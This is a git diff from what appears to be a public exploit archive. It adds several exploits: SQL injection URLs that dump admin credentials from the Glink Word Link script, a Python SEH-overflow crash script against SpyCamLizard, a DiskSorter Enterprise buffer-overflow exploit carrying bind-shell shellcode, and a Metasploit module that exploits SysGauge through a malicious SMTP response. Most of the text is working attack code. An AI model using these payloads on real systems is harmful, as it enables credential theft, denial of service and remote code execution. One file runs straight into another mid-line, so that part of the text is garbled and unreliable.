http://www.tufat.com/wp-content/uploads/sites/4/2015/zips/script_131.zip +# Demo: http://www.tufat.com/glink-word-link-script/ +# Version: 1.2.3 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# #ihsansencan +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/url.php?id=[SQL] +# -1'+union+select+1,2,3,4,5,6,7,concat(user,0x3a,pass),9,10,11,12,13,14,15,16,17,18+from+glink_admin_users--+- +# http://localhost/[PATH]/get_words.php?gid=[SQL] +# -1'+union+select+1,concat(user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+glink_admin_users--+-&step=3 +# http://localhost/[PATH]/get_words.php?wid=[SQL] +# -1'+union+select+1,2,concat(user,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+glink_admin_users--+-&gid=1&step=3 +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/windows/dos/41667.py b/platforms/windows/dos/41667.py new file mode 100755 index 000000000..f331ca5d1 --- /dev/null +++ b/platforms/windows/dos/41667.py @@ -0,0 +1,36 @@ +import socket +import sys + +author = ''' + + ############################################## + # Created: ScrR1pTK1dd13 # + # Name: Greg Priest # + # Mail: ScR1pTK1dd13.slammer@gmail.com # + ############################################## + +# Exploit Title: SpyCamLizard SC liz v1.230 Remote Buffer Overflow ZeroDay +# Date: 2017.03.22 +# Exploit Author: Greg Priest +# Version: SpyCamLizard v1.230 +# Tested on: Windows7 x64 HUN/ENG Enterprise +''' + +print "SpyCamLizard DoS Exploit running!" + +host = "192.168.56.1" +port = 80 +overflow = "A" * 1189 +nextSEH = "BBBB" +SEH = "CCCC" +overflow2= "D" * 3803 + +crash = overflow+nextSEH+SEH+overflow2 + +httpsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM) +httpsocket.connect((host,port)) +httpsocket.send("GET " + crash + " HTTP/1.0\r\n\r\n") +httpsocket.close() + + +print "SpyCamLizard shutted down!" diff --git a/platforms/windows/remote/41666.py b/platforms/windows/remote/41666.py new file mode 100755 index 000000000..ecd58b616 --- /dev/null +++ b/platforms/windows/remote/41666.py @@ -0,0 +1,85 @@ +#!/usr/bin/env python + +# Exploit Title: DiskSorter Enterprise 9.5.12 - 'GET' Remote buffer overflow (SEH) +# Date: 2017-03-22 +# Exploit Author: Daniel Teixeira +# Author Homepage: www.danielteixeira.com +# Vendor Homepage: http://www.disksorter.com +# Software Link: http://www.disksorter.com/setups/disksorterent_setup_v9.5.12.exe +# Version: 9.5.12 +# Tested on: Windows 7 SP1 x86 + +import socket,os,time,struct + +host = "192.168.2.186" +port = 80 + +#Bad Chars \x00\x09\x0a\x0d\x20" + +#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -b "\x00\x09\x0a\x0d\x20" -f python +shellcode = "" +shellcode += "\xd9\xc0\xd9\x74\x24\xf4\x5e\xbf\xb0\x9b\x0e\xf2\x33" +shellcode += "\xc9\xb1\x53\x31\x7e\x17\x83\xee\xfc\x03\xce\x88\xec" +shellcode += "\x07\xd2\x47\x72\xe7\x2a\x98\x13\x61\xcf\xa9\x13\x15" +shellcode += "\x84\x9a\xa3\x5d\xc8\x16\x4f\x33\xf8\xad\x3d\x9c\x0f" +shellcode += "\x05\x8b\xfa\x3e\x96\xa0\x3f\x21\x14\xbb\x13\x81\x25" +shellcode += "\x74\x66\xc0\x62\x69\x8b\x90\x3b\xe5\x3e\x04\x4f\xb3" +shellcode += "\x82\xaf\x03\x55\x83\x4c\xd3\x54\xa2\xc3\x6f\x0f\x64" +shellcode += "\xe2\xbc\x3b\x2d\xfc\xa1\x06\xe7\x77\x11\xfc\xf6\x51" +shellcode += "\x6b\xfd\x55\x9c\x43\x0c\xa7\xd9\x64\xef\xd2\x13\x97" +shellcode += "\x92\xe4\xe0\xe5\x48\x60\xf2\x4e\x1a\xd2\xde\x6f\xcf" +shellcode += "\x85\x95\x7c\xa4\xc2\xf1\x60\x3b\x06\x8a\x9d\xb0\xa9" +shellcode += "\x5c\x14\x82\x8d\x78\x7c\x50\xaf\xd9\xd8\x37\xd0\x39" +shellcode += "\x83\xe8\x74\x32\x2e\xfc\x04\x19\x27\x31\x25\xa1\xb7" +shellcode += "\x5d\x3e\xd2\x85\xc2\x94\x7c\xa6\x8b\x32\x7b\xc9\xa1" +shellcode += "\x83\x13\x34\x4a\xf4\x3a\xf3\x1e\xa4\x54\xd2\x1e\x2f" +shellcode += "\xa4\xdb\xca\xda\xac\x7a\xa5\xf8\x51\x3c\x15\xbd\xf9" +shellcode += "\xd5\x7f\x32\x26\xc5\x7f\x98\x4f\x6e\x82\x23\x7e\x33" +shellcode += "\x0b\xc5\xea\xdb\x5d\x5d\x82\x19\xba\x56\x35\x61\xe8" +shellcode += "\xce\xd1\x2a\xfa\xc9\xde\xaa\x28\x7e\x48\x21\x3f\xba" +shellcode += "\x69\x36\x6a\xea\xfe\xa1\xe0\x7b\x4d\x53\xf4\x51\x25" +shellcode += "\xf0\x67\x3e\xb5\x7f\x94\xe9\xe2\x28\x6a\xe0\x66\xc5" +shellcode += "\xd5\x5a\x94\x14\x83\xa5\x1c\xc3\x70\x2b\x9d\x86\xcd" +shellcode += "\x0f\x8d\x5e\xcd\x0b\xf9\x0e\x98\xc5\x57\xe9\x72\xa4" +shellcode += "\x01\xa3\x29\x6e\xc5\x32\x02\xb1\x93\x3a\x4f\x47\x7b" +shellcode += "\x8a\x26\x1e\x84\x23\xaf\x96\xfd\x59\x4f\x58\xd4\xd9" +shellcode += "\x7f\x13\x74\x4b\xe8\xfa\xed\xc9\x75\xfd\xd8\x0e\x80" +shellcode += "\x7e\xe8\xee\x77\x9e\x99\xeb\x3c\x18\x72\x86\x2d\xcd" +shellcode += "\x74\x35\x4d\xc4" + +#Buffer overflow +junk = "A" * 2487 + +#JMP Short = EB 05 +nSEH = "\x90\x90\xEB\x05" #Jump short 5 +#POP POP RET (libspp.dll) +SEH = struct.pack(' 'SysGauge SMTP Validation Buffer Overflow', + 'Description' => %q{ + This module will setup an SMTP server expecting a connection from SysGauge 1.5.18 + via its SMTP server validation. The module sends a malicious response along in the + 220 service ready response and exploits the client, resulting in an unprivileged shell. + }, + 'Author' => + [ + 'Chris Higgins', # msf Module -- @ch1gg1ns + 'Peter Baris' # Initial discovery and PoC + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'EDB', '41479' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Payload' => + { + 'Space' => 306, + 'BadChars' => "\x00\x0a\x0d\x20" + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows Universal', + { + 'Offset' => 176, + 'Ret' => 0x6527635E # call esp # QtGui4.dll + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Feb 28 2017', + 'DefaultTarget' => 0 + ) + register_options( + [ + OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]), + ]) + end + + def on_client_connect(c) + # Note here that the payload must be split into two parts. + # The payload gets jumbled in the stack so we need to split + # and align to get it to execute correctly. + sploit = "220 " + sploit << rand_text(target['Offset']) + # Can only use the last part starting from 232 bytes in + sploit << payload.encoded[232..-1] + sploit << rand_text(2) + sploit << [target.ret].pack('V') + sploit << rand_text(12) + sploit << make_nops(8) + # And the first part up to 232 bytes + sploit << payload.encoded[0..231] + sploit << "ESMTP Sendmail \r\n" + + print_status("Client connected: " + c.peerhost) + print_status("Sending payload...") + + c.put(sploit) + end + +end \ No newline at end of file